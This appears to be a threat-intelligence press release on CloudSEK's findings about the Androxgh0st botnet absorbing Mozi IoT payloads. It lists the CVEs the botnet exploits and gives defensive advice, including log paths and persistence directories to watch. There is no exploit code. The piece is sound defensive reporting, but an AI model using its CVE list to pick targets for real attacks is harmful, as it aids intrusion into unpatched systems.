CloudSEK Uncovers Enhanced Androxgh0st Botnet with Mozi Botnet Integration and Expanded Vulnerability Exploitation

CloudSEK‘s Threat Research team has discovered substantial advancements in the Androxgh0st botnet, revealing that it now exploits a broader range of vulnerabilities across major technologies and integrates components of the infamous IoT-focused Mozi botnet.

Active since January 2024, Androxgh0st initially targeted web servers. However, CloudSEK’s recent analysis of its command and control (C2) logs shows a pivot in tactics, indicating deployment of Mozi payloads and targeting IoT devices, further amplifying its threat profile. (For more information, check the full report.)

Key Findings from CloudSEK’s Research

• Mozi Botnet Integration. Mozi, primarily known for infecting IoT devices such as Netgear and D-Link routers, was thought dormant following a killswitch activation in 2021. However, Androxgh0st’s C2 infrastructure is now deploying Mozi’s IoT payloads, leveraging its propagation capabilities to expand Androxgh0st’s reach. This operational integration suggests a shift towards a unified botnet infrastructure, with Androxgh0st gaining Mozi’s specialized IoT infiltration tactics.
• Expanded Vulnerability Exploitation. Recent activity shows that Androxgh0st now exploits critical vulnerabilities across a wide spectrum of applications, including:

• • Cisco ASA: Exploits XSS vulnerabilities to inject web scripts via unspecified parameters.

• • Atlassian JIRA: Uses path traversal (CVE-2021-26086) to access sensitive files.

• • PHP Frameworks: Targets Laravel (CVE-2018-15133) and PHPUnit (CVE-2017-9841), allowing backdoor access to compromised systems.

• • New Vulnerabilities: CVE-2023-1389 in TP-Link Archer AX21 firmware (unauthenticated command execution) and CVE-2024-36401 in GeoServer (remote code execution) have been exploited, showing Androxgh0st’s capacity to adapt to newer CVEs, adding fresh targets to its already extensive arsenal. (For More information, check full report.)

• Attack Methods and Persistence Tactics: CloudSEK’s command and control analysis indicates Androxgh0st actively deploys brute-force credential stuffing, command injection, file inclusion, and malware propagation. By leveraging Mozi’s IoT capabilities, Androxgh0st now exploits misconfigured routers and devices across a vast geographical range, infecting devices in Asia, Europe, and beyond.

Impact and Security Recommendations from CloudSEK

Androxgh0st’s integration of Mozi and new exploit techniques marks a notable escalation in botnet behavior, impacting web applications and IoT devices on a global scale. Organisations should adopt the following security measures:

1. Immediate Patching. Apply patches for vulnerabilities exploited by Androxgh0st, particularly on Cisco ASA, TP-Link, Atlassian JIRA, PHP frameworks, and routers.
2. Monitor Network Traffic. Track suspicious outbound connections and anomalous login attempts, especially from IoT devices vulnerable to Androxgh0st-Mozi collaboration.
3. Log Analysis. Review HTTP and web server logs for signs of compromise, including suspicious GET or POST requests that suggest command injections, particularly targeting paths such as /cgi-bin/admin.cgi and /setup.cgi.

Enhanced Endpoint Detection. Use EDR tools to detect unauthorised processes, especially in directories like /tmp and /dev/shm, which are commonly exploited by Androxgh0st for persistence.